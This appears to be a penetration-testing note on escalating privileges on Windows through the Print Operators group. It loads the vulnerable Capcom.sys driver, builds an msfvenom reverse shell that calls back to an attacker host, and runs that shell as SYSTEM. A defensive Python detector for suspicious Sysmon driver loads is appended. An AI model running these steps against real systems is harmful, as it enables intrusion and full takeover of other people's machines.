# Print Operators

### Overview

The **Print Operators** group is a highly privileged Windows group. Its members hold several significant privileges, including **`SeLoadDriverPrivilege`**, which allows them to load and manage system drivers.

Because members of this group can load system drivers, they can load a vulnerable driver and use it to escalate privileges on the system.

### Privilege Escalation Steps

1. **Download the Capcom.sys Driver**: The **Capcom.sys** driver is a well-known driver that allows users to execute shellcode with system privileges. Download it from [here](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys) or [here](https://github.com/JoshMorrison99/SeLoadDriverPrivilege). Download the other files as well (`LoadDriver.exe` and `ExploitCapcom.exe`).
2. **Create a Malicious Executable**:

   ```bash
   msfvenom -p windows/x64/shell_reverse_tcp LHOST={ATTACKER_IP} LPORT=4444 -f exe -o rev.exe
   ```
3. **Transfer files**: Transfer `Capcom.sys`, `LoadDriver.exe`, `rev.exe` and `ExploitCapcom.exe` to the victim machine.
4. **Invoke Exe**: Invoke `LoadDriver.exe`. This should return `NTSTATUS: 00000000, WinError: 0`. If it doesn't, try changing the location of `Capcom.sys` or the directory from which you execute `LoadDriver.exe`.

   ```powershell
   .\LoadDriver.exe System\CurrentControlSet\MyService C:\Users\Test\Capcom.sys
   ```
5. **Run Shell**: After successfully loading the driver, use `ExploitCapcom.exe` to execute your malicious executable with elevated privileges:

   ```powershell
   .\ExploitCapcom.exe C:\Windows\Place\to\reverseshell\rev.exe
   ```
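
From the defender's side, step 4 is the observable point: a kernel driver is loaded from a user profile directory rather than a standard driver directory. The following added example (not part of the original page or of the referenced tools) flags such loads in Sysmon Event ID 6 (DriverLoad) records; the sample events, the trusted-directory allow-list and the function names are constructed assumptions.

```python
import ntpath

# Assumed allow-list of directories where kernel drivers normally live; tune per environment.
TRUSTED_DRIVER_DIRS = (
    r"c:\windows\system32\drivers",
    r"c:\windows\system32\driverstore\filerepository",
)

# Constructed Sysmon Event ID 6 (DriverLoad) records, reduced to the fields used below.
SAMPLE_EVENTS = [
    {"EventID": 6, "Computer": "WS01", "Signed": "true", "SignatureStatus": "Valid",
     "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys"},
    # Same shape as step 4 above: a signed driver loaded from a user profile.
    {"EventID": 6, "Computer": "WS01", "Signed": "true", "SignatureStatus": "Valid",
     "ImageLoaded": r"C:\Users\Test\Capcom.sys"},
    # Path that only looks trusted until ".." segments are resolved.
    {"EventID": 6, "Computer": "WS02", "Signed": "false", "SignatureStatus": "Unavailable",
     "ImageLoaded": r"C:\Windows\System32\drivers\..\..\Temp\example.sys"},
    # Non-DriverLoad event, ignored.
    {"EventID": 1, "Computer": "WS02", "Image": r"C:\Windows\System32\cmd.exe"},
]

def is_trusted_path(image_path):
    """True if the normalized path sits under one of the trusted driver directories."""
    norm = ntpath.normpath(image_path).lower()
    return any(norm.startswith(d + "\\") for d in TRUSTED_DRIVER_DIRS)

def suspicious_driver_loads(events):
    """Return (computer, path, reasons) for each DriverLoad event worth triage."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 6:
            continue
        path = ev.get("ImageLoaded", "")
        reasons = []
        # Checked regardless of signature: a validly signed driver can still be vulnerable.
        if not is_trusted_path(path):
            reasons.append("outside standard driver directories")
        if ev.get("Signed", "").lower() != "true" or ev.get("SignatureStatus") != "Valid":
            reasons.append("unsigned or invalid signature")
        if reasons:
            findings.append((ev.get("Computer"), ntpath.normpath(path), reasons))
    return findings

if __name__ == "__main__":
    for computer, path, reasons in suspicious_driver_loads(SAMPLE_EVENTS):
        print(f"{computer}: {path} -> {'; '.join(reasons)}")
```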

### References

1. <https://notes.dollarboysushil.com/windows-privilege-escalation/group-privileges/print-operators#using-capcom.sys-for-privilege-escalation>
2. <https://github.com/JoshMorrison99/SeLoadDriverPrivilege>


